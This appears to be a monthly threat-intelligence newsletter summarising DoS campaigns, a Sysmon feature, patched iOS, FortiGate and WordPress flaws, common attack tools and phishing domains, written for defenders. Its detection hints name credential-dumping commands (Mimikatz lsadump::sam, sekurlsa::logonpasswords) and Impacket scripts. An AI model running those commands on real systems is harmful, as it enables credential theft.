July Threat Intelligence Review
Threat News
CISA Aware of Multiple Sectors being Hit by DENIAL-OF-SERVICE ATTACKS
Security Analyst Recommendations: The last few weeks have seen several major organizations, including Microsoft, have service disruptions due to ongoing denial of service attacks against them. The group Anonymous Sudan is claiming responsibility for the attacks. They are linked to the Russian government. While most of the attacks have disrupted but not brought down their targets, you can expect more activity from this group, especially as the 2024 election cycle starts.
SysMon Now detects Executable creation
Security Analyst Recommendations: In a big win for security, Microsoft’s free tool Sysmon now detects the creation of executable files on a system. The option is FileExecutableDetected and is important because executables are often created later in the exploit chain. If you don’t know what Sysmon is, I highly recommend you look it up. It enhances logging within Windows systems with a low hit to performance that is unnoticeable in most cases. Enhanced logging is also much appreciated by incident responders as it often catches parts of typical exploit chains that are not gathered by baseline Windows logging. Also, Sysmon is now a protected process, making it very difficult to disable.
AI linked to new crop of phishing email attacks
Security Analyst Recommendations: We knew it was coming. AI is going to make a lot of things better for security, but it will also help attackers to better scale their campaigns. In the short term, expect to see a lot of experimenting with AI attack techniques especially when it comes to social engineering. At first these will not be as sophisticated but over time, they will get better and harder to detect. This will make tools like spam filters less reliable which will put more emphasis on training and detection tools.
Vulnerabilities and Exploits
A WordPress plugin called Ultimate Member was exploited by attackers to access backend adminstration across multiple different clients. The plugin itself has around 200,000 installs. Groups using this plugin should look for recent added administrator accounts and malicious IP addresses that were accessing the plugin, as listed out in this article. This comes on the heel of several other WordPress vulnerabilities that were recently released and patched.
Security Analyst Recommendations: WordPress is known for its vulnerabilities, and this is not the first time we’ve seen an exploit in a plugin with large scale use. The main concern here is to ensure that you don’t use the plugin and, if you do, that it was not used to compromise your WordPress infrastructure. This is also a good time to reach out to any third-party management you have contracted for website hosting and maintenance. The issue with WordPress is not so much the vulnerabilities but that you need to actively update your instance to fix the vulnerabilities. This can often fall to the wayside, even with third-party management, so it is always a good idea to check and ensure maintenance processes are in place.
Apple released an emergency patch for two zero-click vulnerabilities in iOS. These vulnerabilities were used by Russian state sponsored hackers to install spyware. Kaspersky wrote a report about the spyware (here), using the name Operation Triangulation because the malware infected multiple different parts of the iOS stack. CISA issued a mandate for all Federal agencies to patch devices, which includes not just mobile devices like iPhone but also Mac devices as well.
Security Analyst Recommendations: A zero-click vulnerability is one that does not require a user to do anything to start the exploit chain. These are very dangerous because once the device is targeted, it is very difficult to prevent the exploit chain from starting. Apple devices are also a blind spot for many organizations due to the lack of mobile device management and the lack of integration between Apple and other IT management platforms. If you are using Apple devices, especially iPads or laptops, update them to the latest version as soon as possible.
330,000 FortiGate Firewalls are still unpatched from CVE-2023-27997. This vulnerability allowed attackers to remotely access networks from external connections and is rated critical. Bishop Fox, a well-known security company, reported that by their estimates around 69% of FortiGate VPN interfaces on the internet are not patched. FortiGate recommends patching immediately, with the patch to fix this vulnerability and others released about a month ago.
Security Analyst Recommendations: Just a friendly reminder that you need to patch your vulnerabilities. These can and will be used, even months after the initial activity, to access your network. While it is very easy to get exhausted by the amount of vulnerabilities coming out, limiting your focus to those under active exploitation (such as those listed by CISA here) can help to make sure you are taking care of the most important threats.
Notable Cyber Activities
CVE BreakDown
CVE-2023-2834 – WordPress BookIt Plugin Authentication Bypass
CVE-2022-22630 – Mac OS X Arbitrary Code Execution
CVE-2023-3420 – Chrome Code Execution Exploit
Top Malware Usage
Ducktail – Stealer that targets Facebook authentication materials inside browsers.
Possible Detection: Browser using headless parameter to download files.
Mimikatz- attack framework used for credential attacks.
Possible Detection: commands that include lsadump::sam or sekurlsa::logonpasswords
Cobalt Strike- Post-exploitation tool kit with multiple features. Recently featured with Blackcat Ransomware (Article).
Possible Detection: suspicious use of named pipes and rundll32 to launch SQL Server Client Configuration.
Impacket- Library of Python scripts used for post-exploitation attacks.
Possible Detection: Normal Windows binary names ending in PY such as psexec.py or wmiexec.py
Phishing
Phishing Trends:
· Using fake reply chains to make the email look more legitimate.
· Completed Doc viaSign, fake document signing requests.
· Increased use of gmail accounts for phishing.
· Use of click trackers within links.
Known Phishing Domains (found across multiple organizations):
· Ohpri.org
· co.delaware.oh.us
· academia-mail.com
· pulstec.co.jp